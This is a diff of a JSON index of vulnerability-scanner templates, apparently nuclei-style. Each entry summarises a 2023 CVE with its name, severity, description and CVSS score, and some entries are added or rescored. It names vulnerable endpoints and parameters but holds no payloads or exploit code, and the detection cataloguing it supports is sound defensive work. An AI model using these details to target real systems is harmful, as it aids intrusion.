+{"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"} +{"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"} +{"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} +{"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"} +{"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} +{"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"} +{"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} -{"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"} -{"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"} +{"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"} +{"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"} {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} -{"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} -{"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"} +{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} +{"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"} +{"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"} +{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"} +{"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"} +{"ID":"CVE-2023-22480","Info":{"Name":"KubeOperator Foreground `kubeconfig` - File Download","Severity":"critical","Description":"KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22480.yaml"} +{"ID":"CVE-2023-22515","Info":{"Name":"Atlassian Confluence - Privilege Escalation","Severity":"critical","Description":"Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22515.yaml"} +{"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"} +{"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} +{"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"} +{"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"} +{"ID":"CVE-2023-23161","Info":{"Name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-23161.yaml"} {"ID":"CVE-2023-23333","Info":{"Name":"SolarView Compact 6.00 - OS Command Injection","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23333.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"} {"ID":"CVE-2023-23489","Info":{"Name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","Severity":"critical","Description":"WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23489.yaml"} -{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n\nNote that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492.yaml"} +{"ID":"CVE-2023-23491","Info":{"Name":"Quick Event Manager \u003c 9.7.5 - Cross-Site Scripting","Severity":"medium","Description":"The Quick Event Manager WordPress Plugin, version \u003c 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-23491.yaml"} +{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492.yaml"} {"ID":"CVE-2023-2356","Info":{"Name":"Mlflow \u003c2.3.0 - Local File Inclusion","Severity":"high","Description":"Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2356.yaml"} {"ID":"CVE-2023-23752","Info":{"Name":"Joomla! Webservice - Password Disclosure","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-23752.yaml"} {"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian \u003c=18.0.49 - Open Redirect","Severity":"medium","Description":"Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is \"the ability to use arbitrary domain names to access the panel is an intended feature.\"\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24044.yaml"} -{"ID":"CVE-2023-24243","Info":{"Name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","Severity":"high","Description":"CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-24243.yaml"} +{"ID":"CVE-2023-24243","Info":{"Name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","Severity":"high","Description":"CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-24243.yaml"} {"ID":"CVE-2023-24278","Info":{"Name":"Squidex \u003c7.4.0 - Cross-Site Scripting","Severity":"medium","Description":"Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24278.yaml"} {"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24322.yaml"} {"ID":"CVE-2023-24367","Info":{"Name":"Temenos T24 R20 - Cross-Site Scripting","Severity":"medium","Description":"Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24367.yaml"} {"ID":"CVE-2023-24488","Info":{"Name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","Severity":"medium","Description":"Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24488.yaml"} +{"ID":"CVE-2023-24489","Info":{"Name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-24489.yaml"} {"ID":"CVE-2023-24657","Info":{"Name":"phpIPAM - 1.6 - Cross-Site Scripting","Severity":"medium","Description":"phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24657.yaml"} {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"} {"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"} -{"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} +{"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} +{"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"} {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} +{"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"} {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} +{"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"} {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} -{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"critical","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"} +{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"} +{"ID":"CVE-2023-26469","Info":{"Name":"Jorani 1.0.0 - Remote Code Execution","Severity":"critical","Description":"Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26469.yaml"} +{"ID":"CVE-2023-2648","Info":{"Name":"Weaver E-Office 9.5 - Remote Code Execution","Severity":"critical","Description":"A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2648.yaml"} {"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"} {"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"} -{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} -{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"medium","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"} -{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"critical","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"} +{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} +{"ID":"CVE-2023-27034","Info":{"Name":"Blind SQL injection vulnerability in Jms Blog","Severity":"critical","Description":"The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27034.yaml"} +{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"high","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"} +{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"high","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"} {"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-27292.yaml"} 